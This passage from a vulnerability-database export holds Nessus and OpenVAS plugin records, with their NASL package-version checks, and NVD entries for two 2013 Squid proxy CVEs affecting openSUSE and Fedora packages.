script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:squid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:squid-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:squid-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"squid-3.2.11-3.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"squid-debuginfo-3.2.11-3.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"squid-debugsource-3.2.11-3.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"squid / squid-debuginfo / squid-debugsource\");\n}\n", "title": "openSUSE Security Update : squid (openSUSE-SU-2013:1435-1)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 6, "lastseen": "2018-11-13T17:08:25"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:squid", "p-cpe:/a:novell:opensuse:squid-debuginfo", "p-cpe:/a:novell:opensuse:squid-debugsource"], "cvelist": ["CVE-2013-4115", "CVE-2013-4123"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "This squid update includes several security fixes and minor changes.\n\n - squid-3.2.x-11823-bnc829084-CVE-2013-4115.diff fixes a\n buffer overflow involving very long hostnames.\n [bnc#829084] CVE-2013-4115\n\n - squid-3.2.x-11823-bnc830319-CVE-2013-4123.diff fixes\n problems identifying a port number as specified by the\n client. [bnc#830319] CVE-2013-4123\n\n - run logrotate as squid:nogroup [bnc#677335]", "edition": 7, "enchantments": {"dependencies": {"modified": "2019-01-16T20:18:50", "references": [{"idList": ["30A04AB4-ED7B-11E2-8643-8C705AF55518"], "type": "freebsd"}, {"idList": ["RHSA-2014:1148"], "type": "redhat"}, {"idList": ["GLSA-201309-22"], "type": "gentoo"}, {"idList": ["FREEBSD_PKG_30A04AB4ED7B11E286438C705AF55518.NASL", "FEDORA_2013-13468.NASL", "MANDRIVA_MDVSA-2013-199.NASL", "FEDORA_2013-13493.NASL", "SUSE_11_SQUID-130909.NASL", "SOLARIS11_SQUID_20140114.NASL", "OPENSUSE-2013-700.NASL", "SQUID_3_2_13.NASL", "SQUID_3_2_12.NASL", "SL_20140903_SQUID_ON_SL5_X.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:26886"], "type": "exploitdb"}, {"idList": ["SECURITYVULNS:VULN:13190", "SECURITYVULNS:DOC:29651"], "type": "securityvulns"}, {"idList": ["ALAS-2014-411", "ALAS-2014-433"], "type": "amazon"}, {"idList": ["OPENVAS:1361412562310802057", "OPENVAS:1361412562310867694", "OPENVAS:867694", "OPENVAS:866446", "OPENVAS:1361412562310868180", "OPENVAS:1361412562310866446", "OPENVAS:1361412562310881993", "OPENVAS:866539", "OPENVAS:1361412562310866539", "OPENVAS:1361412562310868397"], "type": "openvas"}, {"idList": ["CVE-2013-4115", "CVE-2013-4123"], "type": "cve"}, {"idList": ["ELSA-2014-1148"], "type": "oraclelinux"}, {"idList": ["SUSE-SU-2016:1996-1", "SUSE-SU-2016:2089-1"], "type": "suse"}, {"idList": ["CESA-2014:1148"], "type": "centos"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "69bff15ee8289df2ea921fbc7b0b92b613d4d6e62a0bd2949f8ea42afb45ea4d", "hashmap": [{"hash": "a9c8031d74a07d7e33fd88d65f153ea7", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "b034a93b608eb52f64d3654bd54c1517", "key": "description"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "28bcb1165dd12fbeecaf144ae8efd1ea", "key": "pluginID"}, {"hash": "e9866a672d1f669dcfb25433a3e513ef", "key": "references"}, {"hash": "02fcc0c238d215158fbaabb854c5b3df", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "3c764d4cf584f9ded7aa4dcca57c78ff", "key": "modified"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "bc8a3240a3892002dc2383d889ce08c3", "key": "cpe"}, {"hash": "803e6e04e94c43e379784942aacbfc60", "key": "title"}, {"hash": "4247f101bb7aea04fc4134f24162dbd6", "key": "sourceData"}, {"hash": "14b67dbf5e4b07f7620b0f638b93dab1", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=75140", "id": "OPENSUSE-2013-699.NASL", "lastseen": "2019-01-16T20:18:50", "modified": "2018-11-10T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "75140", "published": "2014-06-13T00:00:00", "references": ["https://lists.opensuse.org/opensuse-updates/2013-09/msg00024.html", "https://bugzilla.novell.com/show_bug.cgi?id=830319", "https://bugzilla.novell.com/show_bug.cgi?id=829084", "https://bugzilla.novell.com/show_bug.cgi?id=677335"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-699.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75140);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/11/10 11:50:01\");\n\n script_cve_id(\"CVE-2013-4115\", \"CVE-2013-4123\");\n\n script_name(english:\"openSUSE Security Update : squid (openSUSE-SU-2013:1435-1)\");\n script_summary(english:\"Check for the openSUSE-2013-699 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This squid update includes several security fixes and minor changes.\n\n - squid-3.2.x-11823-bnc829084-CVE-2013-4115.diff fixes a\n buffer overflow involving very long hostnames.\n [bnc#829084] CVE-2013-4115\n\n - squid-3.2.x-11823-bnc830319-CVE-2013-4123.diff fixes\n problems identifying a port number as specified by the\n client. [bnc#830319] CVE-2013-4123\n\n - run logrotate as squid:nogroup [bnc#677335]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=677335\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=829084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=830319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-09/msg00024.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected squid packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:squid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:squid-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:squid-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"squid-3.2.11-3.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"squid-debuginfo-3.2.11-3.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"squid-debugsource-3.2.11-3.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"squid / squid-debuginfo / squid-debugsource\");\n}\n", "title": "openSUSE Security Update : squid (openSUSE-SU-2013:1435-1)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 7, "lastseen": "2019-01-16T20:18:50"}], "edition": 12, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "bc8a3240a3892002dc2383d889ce08c3"}, {"key": "cvelist", "hash": "14b67dbf5e4b07f7620b0f638b93dab1"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "description", "hash": "b034a93b608eb52f64d3654bd54c1517"}, {"key": "href", "hash": "7f18f59328bd12da4fa30bb9ecfa417b"}, {"key": "modified", "hash": "2249940a684898a70237266de5d6dd6c"}, {"key": "naslFamily", "hash": "71a40666da62ba38d22539c8277870c7"}, {"key": "pluginID", "hash": "28bcb1165dd12fbeecaf144ae8efd1ea"}, {"key": "published", "hash": "02fcc0c238d215158fbaabb854c5b3df"}, {"key": "references", "hash": "e9866a672d1f669dcfb25433a3e513ef"}, {"key": "reporter", "hash": "3ac27814e21dbbdbed6b1f79a83eb599"}, {"key": "sourceData", "hash": "4247f101bb7aea04fc4134f24162dbd6"}, {"key": "title", "hash": "803e6e04e94c43e379784942aacbfc60"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "94fd4ef1c57bed018551b70eb2fd7f761d219c0eb1f5e83d17d98ef4c0c64296", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-4123", "CVE-2013-4115"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310866539", "OPENVAS:866539", "OPENVAS:867694", "OPENVAS:1361412562310867694", "OPENVAS:1361412562310868180", "OPENVAS:1361412562310868397", "OPENVAS:866446", "OPENVAS:1361412562310866446", "OPENVAS:1361412562310802057", "OPENVAS:1361412562310871232"]}, {"type": "nessus", "idList": ["FEDORA_2013-13468.NASL", "FEDORA_2013-13493.NASL", "FREEBSD_PKG_30A04AB4ED7B11E286438C705AF55518.NASL", "SQUID_3_2_13.NASL", "SOLARIS11_SQUID_20140114.NASL", "SUSE_11_SQUID-130909.NASL", "SQUID_3_2_12.NASL", "MANDRIVA_MDVSA-2013-199.NASL", "OPENSUSE-2013-700.NASL", "ALA_ALAS-2014-411.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:26886"]}, {"type": "freebsd", "idList": ["30A04AB4-ED7B-11E2-8643-8C705AF55518"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29651", "SECURITYVULNS:VULN:13190"]}, {"type": "redhat", "idList": ["RHSA-2014:1148"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-1148"]}, {"type": "amazon", "idList": ["ALAS-2014-411", "ALAS-2014-433"]}, {"type": "centos", "idList": ["CESA-2014:1148"]}, {"type": "gentoo", "idList": ["GLSA-201309-22"]}, {"type": "suse", "idList": ["SUSE-SU-2016:2089-1", "SUSE-SU-2016:1996-1"]}], "modified": "2020-01-01T00:27:15"}, "score": {"value": 7.3, "vector": "NONE", "modified": "2020-01-01T00:27:15"}, "vulnersScore": 7.3}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-699.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75140);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/11/10 11:50:01\");\n\n script_cve_id(\"CVE-2013-4115\", \"CVE-2013-4123\");\n\n script_name(english:\"openSUSE Security Update : squid (openSUSE-SU-2013:1435-1)\");\n script_summary(english:\"Check for the openSUSE-2013-699 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This squid update includes several security fixes and minor changes.\n\n - squid-3.2.x-11823-bnc829084-CVE-2013-4115.diff fixes a\n buffer overflow involving very long hostnames.\n [bnc#829084] CVE-2013-4115\n\n - squid-3.2.x-11823-bnc830319-CVE-2013-4123.diff fixes\n problems identifying a port number as specified by the\n client. [bnc#830319] CVE-2013-4123\n\n - run logrotate as squid:nogroup [bnc#677335]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=677335\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=829084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=830319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-09/msg00024.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected squid packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:squid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:squid-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:squid-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"squid-3.2.11-3.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"squid-debuginfo-3.2.11-3.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"squid-debugsource-3.2.11-3.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"squid / squid-debuginfo / squid-debugsource\");\n}\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "75140", "cpe": ["cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:squid", "p-cpe:/a:novell:opensuse:squid-debuginfo", "p-cpe:/a:novell:opensuse:squid-debugsource"], "scheme": null}

{"cve": [{"lastseen": "2019-05-29T18:13:04", "bulletinFamily": "NVD", "description": "client_side_request.cc in Squid 3.2.x before 3.2.13 and 3.3.x before 3.3.8 allows remote attackers to cause a denial of service via a crafted port number in a HTTP Host header.", "modified": "2018-10-30T16:27:00", "id": "CVE-2013-4123", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4123", "published": "2013-09-16T19:14:00", "title": "CVE-2013-4123", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:13:04", "bulletinFamily": "NVD", "description": "Buffer overflow in the idnsALookup function in dns_internal.cc in Squid 3.2 through 3.2.11 and 3.3 through 3.3.6 allows remote attackers to cause a denial of service (memory corruption and server termination) via a long name in a DNS lookup request.", "modified": "2018-10-30T16:27:00", "id": "CVE-2013-4115", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4115", "published": "2013-08-09T22:55:00", "title": "CVE-2013-4115", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:38:12", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-08-20T00:00:00", "id": "OPENVAS:1361412562310866539", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310866539", "title": "Fedora Update for squid FEDORA-2013-13468", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for squid FEDORA-2013-13468\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.866539\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-20 15:15:21 +0530 (Tue, 20 Aug 2013)\");\n script_cve_id(\"CVE-2013-4123\", \"CVE-2013-4115\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for squid FEDORA-2013-13468\");\n\n\n script_tag(name:\"affected\", value:\"squid on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-13468\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-August/113058.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'squid'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"squid\", rpm:\"squid~3.2.13~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-26T11:10:01", "bulletinFamily": "scanner", "description": "Check for the Version of squid", "modified": "2018-01-25T00:00:00", "published": "2013-08-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=866539", "id": "OPENVAS:866539", "title": "Fedora Update for squid FEDORA-2013-13468", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for squid FEDORA-2013-13468\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(866539);\n script_version(\"$Revision: 8526 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-25 07:57:37 +0100 (Thu, 25 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-20 15:15:21 +0530 (Tue, 20 Aug 2013)\");\n script_cve_id(\"CVE-2013-4123\", \"CVE-2013-4115\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for squid FEDORA-2013-13468\");\n\n tag_insight = \"Squid is a high-performance proxy caching server for Web clients,\nsupporting FTP, gopher, and HTTP data objects. Unlike traditional\ncaching software, Squid handles all requests in a single,\nnon-blocking, I/O-driven process. Squid keeps meta data and especially\nhot objects cached in RAM, caches DNS lookups, supports non-blocking\nDNS lookups, and implements negative caching of failed requests.\n\nSquid consists of a main server program squid, a Domain Name System\nlookup program (dnsserver), a program for retrieving FTP data\n(ftpget), and some management and client tools.\n\";\n\n tag_affected = \"squid on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-13468\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-August/113058.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of squid\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"squid\", rpm:\"squid~3.2.13~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:17", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-04-16T00:00:00", "id": "OPENVAS:1361412562310867694", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867694", "title": "Fedora Update for squid FEDORA-2014-4800", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for squid FEDORA-2014-4800\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867694\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-16 11:10:38 +0530 (Wed, 16 Apr 2014)\");\n script_cve_id(\"CVE-2013-4123\", \"CVE-2013-4115\", \"CVE-2014-0128\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for squid FEDORA-2014-4800\");\n script_tag(name:\"affected\", 